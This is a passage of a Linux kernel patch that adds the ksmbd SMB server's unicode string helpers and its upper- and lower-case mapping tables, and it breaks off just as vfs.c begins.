++ * reserved symbols (along with \ and /), otherwise illegal to store
++ * in filenames in NTFS
++ */
++#define UNI_ASTERISK    ((__u16)('*' + 0xF000))
++#define UNI_QUESTION    ((__u16)('?' + 0xF000))
++#define UNI_COLON       ((__u16)(':' + 0xF000))
++#define UNI_GRTRTHAN    ((__u16)('>' + 0xF000))
++#define UNI_LESSTHAN    ((__u16)('<' + 0xF000))
++#define UNI_PIPE        ((__u16)('|' + 0xF000))
++#define UNI_SLASH       ((__u16)('\\' + 0xF000))
++
++/* Just define what we want from uniupr.h.  We don't want to define the tables
++ * in each source file.
++ */
++#ifndef	UNICASERANGE_DEFINED
++struct UniCaseRange {
++	wchar_t start;
++	wchar_t end;
++	signed char *table;
++};
++#endif				/* UNICASERANGE_DEFINED */
++
++#ifndef UNIUPR_NOUPPER
++extern signed char SmbUniUpperTable[512];
++extern const struct UniCaseRange SmbUniUpperRange[];
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++extern signed char CifsUniLowerTable[512];
++extern const struct UniCaseRange CifsUniLowerRange[];
++#endif				/* UNIUPR_NOLOWER */
++
++#ifdef __KERNEL__
++int smb_strtoUTF16(__le16 *to, const char *from, int len,
++		   const struct nls_table *codepage);
++char *smb_strndup_from_utf16(const char *src, const int maxlen,
++			     const bool is_unicode,
++			     const struct nls_table *codepage);
++int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
++		      const struct nls_table *cp, int mapchars);
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
++#endif
++
++/*
++ * UniStrcat:  Concatenate the second string to the first
++ *
++ * Returns:
++ *     Address of the first string
++ */
++static inline wchar_t *UniStrcat(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save a pointer to start of ucs1 */
++
++	while (*ucs1++)
++	/*NULL*/;	/* To end of first string */
++	ucs1--;			/* Return to the null */
++	while ((*ucs1++ = *ucs2++))
++	/*NULL*/;	/* copy string 2 over */
++	return anchor;
++}
++
++/*
++ * UniStrchr:  Find a character in a string
++ *
++ * Returns:
++ *     Address of first occurrence of character in string
++ *     or NULL if the character is not in the string
++ */
++static inline wchar_t *UniStrchr(const wchar_t *ucs, wchar_t uc)
++{
++	while ((*ucs != uc) && *ucs)
++		ucs++;
++
++	if (*ucs == uc)
++		return (wchar_t *)ucs;
++	return NULL;
++}
++
++/*
++ * UniStrcmp:  Compare two strings
++ *
++ * Returns:
++ *     < 0:  First string is less than second
++ *     = 0:  Strings are equal
++ *     > 0:  First string is greater than second
++ */
++static inline int UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	while ((*ucs1 == *ucs2) && *ucs1) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)*ucs2;
++}
++
++/*
++ * UniStrcpy:  Copy a string
++ */
++static inline wchar_t *UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save the start of result string */
++
++	while ((*ucs1++ = *ucs2++))
++	/*NULL*/;
++	return anchor;
++}
++
++/*
++ * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
++ */
++static inline size_t UniStrlen(const wchar_t *ucs1)
++{
++	int i = 0;
++
++	while (*ucs1++)
++		i++;
++	return i;
++}
++
++/*
++ * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
++ *		string (length limited)
++ */
++static inline size_t UniStrnlen(const wchar_t *ucs1, int maxlen)
++{
++	int i = 0;
++
++	while (*ucs1++) {
++		i++;
++		if (i >= maxlen)
++			break;
++	}
++	return i;
++}
++
++/*
++ * UniStrncat:  Concatenate length limited string
++ */
++static inline wchar_t *UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
++
++	while (*ucs1++)
++	/*NULL*/;
++	ucs1--;			/* point to null terminator of s1 */
++	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
++		ucs1++;
++		ucs2++;
++	}
++	*ucs1 = 0;		/* Null terminate the result */
++	return anchor;
++}
++
++/*
++ * UniStrncmp:  Compare length limited string
++ */
++static inline int UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)*ucs2;
++}
++
++/*
++ * UniStrncmp_le:  Compare length limited string - native to little-endian
++ */
++static inline int
++UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)__le16_to_cpu(*ucs2);
++}
++
++/*
++ * UniStrncpy:  Copy length limited string with pad
++ */
++static inline wchar_t *UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = *ucs2++;
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrncpy_le:  Copy length limited string with pad to little-endian
++ */
++static inline wchar_t *UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = __le16_to_cpu(*ucs2++);
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrstr:  Find a string in a string
++ *
++ * Returns:
++ *     Address of first match found
++ *     NULL if no matching string is found
++ */
++static inline wchar_t *UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	const wchar_t *anchor1 = ucs1;
++	const wchar_t *anchor2 = ucs2;
++
++	while (*ucs1) {
++		if (*ucs1 == *ucs2) {
++			/* Partial match found */
++			ucs1++;
++			ucs2++;
++		} else {
++			if (!*ucs2)	/* Match found */
++				return (wchar_t *)anchor1;
++			ucs1 = ++anchor1;	/* No match */
++			ucs2 = anchor2;
++		}
++	}
++
++	if (!*ucs2)		/* Both end together */
++		return (wchar_t *)anchor1;	/* Match found */
++	return NULL;		/* No match */
++}
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * UniToupper:  Convert a unicode character to upper case
++ */
++static inline wchar_t UniToupper(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(SmbUniUpperTable)) {
++		/* Latin characters */
++		return uc + SmbUniUpperTable[uc];	/* Use base tables */
++	}
++
++	rp = SmbUniUpperRange;	/* Use range tables */
++	while (rp->start) {
++		if (uc < rp->start)	/* Before start of range */
++			return uc;	/* Uppercase = input */
++		if (uc <= rp->end)	/* In range */
++			return uc + rp->table[uc - rp->start];
++		rp++;	/* Try next range */
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrupr:  Upper case a unicode string
++ */
++static inline __le16 *UniStrupr(register __le16 *upin)
++{
++	register __le16 *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * UniTolower:  Convert a unicode character to lower case
++ */
++static inline wchar_t UniTolower(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniLowerTable)) {
++		/* Latin characters */
++		return uc + CifsUniLowerTable[uc];	/* Use base tables */
++	}
++
++	rp = CifsUniLowerRange;	/* Use range tables */
++	while (rp->start) {
++		if (uc < rp->start)	/* Before start of range */
++			return uc;	/* Uppercase = input */
++		if (uc <= rp->end)	/* In range */
++			return uc + rp->table[uc - rp->start];
++		rp++;	/* Try next range */
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrlwr:  Lower case a unicode string
++ */
++static inline wchar_t *UniStrlwr(register wchar_t *upin)
++{
++	register wchar_t *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = UniTolower(*up);
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++
++#endif
++
++#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/smb/server/uniupr.h b/fs/smb/server/uniupr.h
+new file mode 100644
+index 0000000000000..26583b776897b
+--- /dev/null
++++ b/fs/smb/server/uniupr.h
+@@ -0,0 +1,268 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Some of the source code in this file came from fs/cifs/uniupr.h
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *
++ * uniupr.h - Unicode compressed case ranges
++ *
++ */
++#ifndef __KSMBD_UNIUPR_H
++#define __KSMBD_UNIUPR_H
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * Latin upper case
++ */
++signed char SmbUniUpperTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++				-32, -32, -32, -32, -32,	/* 060-06f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++				-32, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++			 -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
++	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32,
++			 -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
++	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
++	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
++	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
++	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
++	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
++};
++
++/* Upper case range - Greek */
++static signed char UniCaseRangeU03a0[47] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 3b0-3bf */
++	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
++	-63, -63,
++};
++
++/* Upper case range - Cyrillic */
++static signed char UniCaseRangeU0430[48] = {
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 430-43f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 440-44f */
++	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80,
++					 -80, -80, 0, -80, -80,	/* 450-45f */
++};
++
++/* Upper case range - Extended cyrillic */
++static signed char UniCaseRangeU0490[61] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
++	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
++};
++
++/* Upper case range - Extended latin and greek */
++static signed char UniCaseRangeU1e00[509] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
++	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
++	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
++	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112,
++				 126, 126, 0, 0,	/* 1f70-1f7f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
++	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
++	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Upper case range - Wide latin */
++static signed char UniCaseRangeUff40[27] = {
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++			 -32, -32, -32, -32, -32,	/* ff40-ff4f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++};
++
++/*
++ * Upper Case Range
++ */
++const struct UniCaseRange SmbUniUpperRange[] = {
++	{0x03a0, 0x03ce, UniCaseRangeU03a0},
++	{0x0430, 0x045f, UniCaseRangeU0430},
++	{0x0490, 0x04cc, UniCaseRangeU0490},
++	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
++	{0xff40, 0xff5a, UniCaseRangeUff40},
++	{0}
++};
++#endif
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * Latin lower case
++ */
++signed char CifsUniLowerTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 040-04f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0,
++					 0, 0, 0,	/* 050-05f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++				 32, 32, 32, 32,	/* 0c0-0cf */
++	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32,
++					 32, 32, 32, 0,	/* 0d0-0df */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
++	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
++	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0,
++						 0,	/* 170-17f */
++	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79,
++						 0,	/* 180-18f */
++	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
++	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
++	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
++};
++
++/* Lower case range - Greek */
++static signed char UniCaseRangeL0380[44] = {
++	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++						 32, 32, 32,	/* 390-39f */
++	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/* Lower case range - Cyrillic */
++static signed char UniCaseRangeL0400[48] = {
++	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80,
++					 0, 80, 80,	/* 400-40f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 410-41f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 420-42f */
++};
++
++/* Lower case range - Extended cyrillic */
++static signed char UniCaseRangeL0490[60] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
++	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
++};
++
++/* Lower case range - Extended latin and greek */
++static signed char UniCaseRangeL1e00[504] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
++	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0,
++							 0, 0,	/* 1fc0-1fcf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0,
++							 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Lower case range - Wide latin */
++static signed char UniCaseRangeLff20[27] = {
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++							 32,	/* ff20-ff2f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/*
++ * Lower Case Range
++ */
++const struct UniCaseRange CifsUniLowerRange[] = {
++	{0x0380, 0x03ab, UniCaseRangeL0380},
++	{0x0400, 0x042f, UniCaseRangeL0400},
++	{0x0490, 0x04cb, UniCaseRangeL0490},
++	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
++	{0xff20, 0xff3a, UniCaseRangeLff20},
++	{0}
++};
++#endif
++
++#endif /* __KSMBD_UNIUPR_H */
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+new file mode 100644
+index 0000000000000..36914db8b6616
+--- /dev/null
++++ b/fs/smb/server/vfs.c
+@@ -0,0 +1,1911 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
